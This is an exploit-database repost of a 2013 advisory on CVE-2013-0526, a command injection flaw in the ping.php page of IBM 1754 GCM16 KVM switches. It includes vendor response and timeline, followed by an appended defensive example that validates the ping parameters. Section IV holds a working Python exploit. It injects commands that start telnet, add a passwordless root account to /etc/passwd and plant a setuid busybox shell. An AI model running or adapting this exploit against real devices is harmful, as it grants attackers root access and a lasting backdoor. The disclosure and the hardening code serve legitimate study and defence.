0day.today - Biggest Exploit Database in the World.
IBM 1754 GCM16 1.18.0.22011 Command Execution Vulnerability
Security Risk: High
I. Product description

The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance.

II. Vulnerability information

Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526
CVSS Score: 8.5

III. Vulnerability details

GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw that allows a remote authenticated user to execute unauthorized commands as root. This flaw exists because webapp variables are not sanitised. In this case, the parameters $count and $size from ping.php allow a specially crafted URL to inject text into an exec() call, so it can be used to execute any command on the KVM's embedded Linux.

IV. Proof of concept

Following is a simple exploit that leads to root access on the device, opening a telnet service and creating a new user with root permissions and no password (sessid and target are hardcoded, so they must be changed for it to work):

```python
#!/usr/bin/python
"""
This exploit for Avocent KVM switch allows to gain root access to embedded device.
SessionId (avctSessionId) is necessary for this to work, so you need a valid user.
Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target)
then do "/tmp/su - superb" to gain root
"""
from StringIO import StringIO
import pycurl
import re

sessid = "XXXXXXXXX"                     # avctSessionId cookie of an authenticated user
target = "https://ip.of.kvm/ping.php"    # vulnerable endpoint on the KVM
command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to device using telnet with user target and pass target, then \"/tmp/su - superb\""

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
# the injected text rides on the unsanitised count parameter
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    c.perform()
    c.close()
except:
    print ""
content = storage.getvalue()
# the command output is returned between the *E* markers
x1 = re.search(r"\*E\*(.*)\*E\*", content)
print x1.group(1).replace("<br />", "\n")
```

V. Vendor Response

IBM released a new firmware that corrects this vulnerability (1.20.0.22575).

VI. Timeline

2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.

VII. External information

Information about this vulnerability (in Spanish): http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html
IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509

--
Alejandro Alvarez Bravo
alex.a.bravo@gmail.com

# 0day.today [2024-07-08] #
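The root cause in section III is that the $count and $size values reach exec() unsanitised. The following is an added example (Python 3, not IBM's, Avocent's or the advisory author's code) of the server-side shape that removes this bug class: strict validation of each ping.php parameter and an argv-based ping invocation with no shell. Parameter names come from the advisory; the bounds, argv layout and sample request bodies are constructed assumptions.

```python
"""Server-side handling of ping.php-style parameters, written as an added
example (not IBM/Avocent code): user input is validated and handed to ping as
separate argv elements, never through a shell. Bounds and layout are assumed."""
import ipaddress
import subprocess
from urllib.parse import parse_qs

MAX_COUNT = 10    # assumed upper bounds for a diagnostic ping
MAX_SIZE = 1472


def _bounded_int(params, name, upper):
    """Accept only a plain decimal integer in [1, upper]; ';', ' ' or '-' fail isdecimal()."""
    raw = params.get(name, [""])[0]
    if not raw.isdecimal():
        raise ValueError("%s must be a decimal integer, got %r" % (name, raw))
    value = int(raw)
    if not 1 <= value <= upper:
        raise ValueError("%s out of range: %d" % (name, value))
    return value


def build_ping_argv(post_body):
    """Parse a raw POST body into an argv list or raise ValueError. Each value is its
    own argv element, so shell metacharacters in count/size are just rejected integers."""
    params = parse_qs(post_body, keep_blank_values=True, strict_parsing=True)
    if params.get("action") != ["ping"]:
        raise ValueError("unsupported action")
    address = str(ipaddress.ip_address(params.get("address", [""])[0]))  # literal IP only
    count = _bounded_int(params, "count", MAX_COUNT)
    size = _bounded_int(params, "size", MAX_SIZE)
    return ["ping", "-c", str(count), "-s", str(size), address]


def is_rejected(post_body):
    """True when validation refuses the body."""
    try:
        build_ping_argv(post_body)
    except ValueError:
        return True
    return False


def run_ping(post_body):
    """Run the validated command; shell=False (the default) is spelled out on purpose."""
    return subprocess.run(build_ping_argv(post_body), shell=False,
                          capture_output=True, text=True, timeout=30)


# Constructed sample bodies: a legitimate request and one shaped like the advisory's payload.
GOOD_BODY = "address=255.255.255.255&action=ping&size=56&count=1"
INJECTED_BODY = "address=255.255.255.255&action=ping&size=56&count=1 ; echo injected"
```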